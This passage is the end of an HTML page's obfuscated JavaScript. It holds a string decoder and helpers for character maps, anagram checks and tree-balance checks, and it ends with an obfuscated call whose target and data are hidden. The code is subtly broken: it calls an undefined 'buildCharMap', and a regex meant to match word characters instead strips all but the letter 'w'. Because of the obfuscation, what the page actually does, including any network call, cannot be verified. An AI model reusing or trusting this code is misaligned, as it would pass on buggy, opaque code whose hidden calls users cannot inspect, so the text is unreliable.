Umd97Q=_PoKZj.indexOf(MSUxhJ2[eS9fQMb]);if(Umd97Q===-FZHYVb[0x1])continue;if(FUaXU5<FZHYVb[0x0]){FUaXU5=Umd97Q}else{N4W9hYK(FUaXU5+=Umd97Q*FZHYVb[0xc],nco7OV|=FUaXU5<<R_2lkdW,R_2lkdW+=(FUaXU5&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Q4sOnFn.push(nco7OV&FZHYVb[0x3]),nco7OV>>=FZHYVb[0x2],R_2lkdW-=FZHYVb[0x2])}while(R_2lkdW>FZHYVb[0x9]);FUaXU5=-FZHYVb[0x1]}}if(FUaXU5>-FZHYVb[0x1]){Q4sOnFn.push((nco7OV|FUaXU5<<R_2lkdW)&FZHYVb[0x3])}return t24J32(Q4sOnFn)}function _PoKZj(_PoKZj){if(typeof rxdmS4[_PoKZj]===FZHYVb[0x5]){return rxdmS4[_PoKZj]=g3Gld7J(FlCAu25[_PoKZj])}return rxdmS4[_PoKZj]}function MSUxhJ2(g3Gld7J){const _PoKZj={};for(let MSUxhJ2 of g3Gld7J.replace(/[^w]/g,"").toLowerCase())_PoKZj[MSUxhJ2]=_PoKZj[MSUxhJ2]+FZHYVb[0x1]||FZHYVb[0x1];return _PoKZj}function j2tRUWQ(g3Gld7J,_PoKZj){const MSUxhJ2=buildCharMap(g3Gld7J),j2tRUWQ=buildCharMap(_PoKZj);for(let Q4sOnFn in MSUxhJ2)if(MSUxhJ2[Q4sOnFn]!==j2tRUWQ[Q4sOnFn]){return FZHYVb[0x26]}if(Object.keys(MSUxhJ2).length!==Object.keys(j2tRUWQ).length){return FZHYVb[0x26]}return!0x0}function Q4sOnFn(g3Gld7J){const _PoKZj=nco7OV(g3Gld7J);return _PoKZj!==0x1/0x0}function nco7OV(g3Gld7J){if(!g3Gld7J){return-FZHYVb[0x1]}const _PoKZj=nco7OV(g3Gld7J.left),MSUxhJ2=nco7OV(g3Gld7J.right),j2tRUWQ=Math.abs(_PoKZj-MSUxhJ2);if(_PoKZj===0x1/0x0||MSUxhJ2===0x1/0x0||j2tRUWQ>FZHYVb[0x1]){return 0x1/0x0}const Q4sOnFn=Math.max(_PoKZj,MSUxhJ2)+FZHYVb[0x1];return Q4sOnFn}window[_PoKZj(0x9a)]={buildCharacterMap:MSUxhJ2,isAnagrams:j2tRUWQ,isBalanced:Q4sOnFn,getHeightBalanced:nco7OV}}return io4LB2P(_PoKZj(0x9b),{[_PoKZj(0x9c)]:FUaXU5,[_PoKZj(0x9d)]:Umd97Q})[_PoKZj(0x9e)](()=>{})}})}g3Gld7J()})();
</script>

</body>
</html>
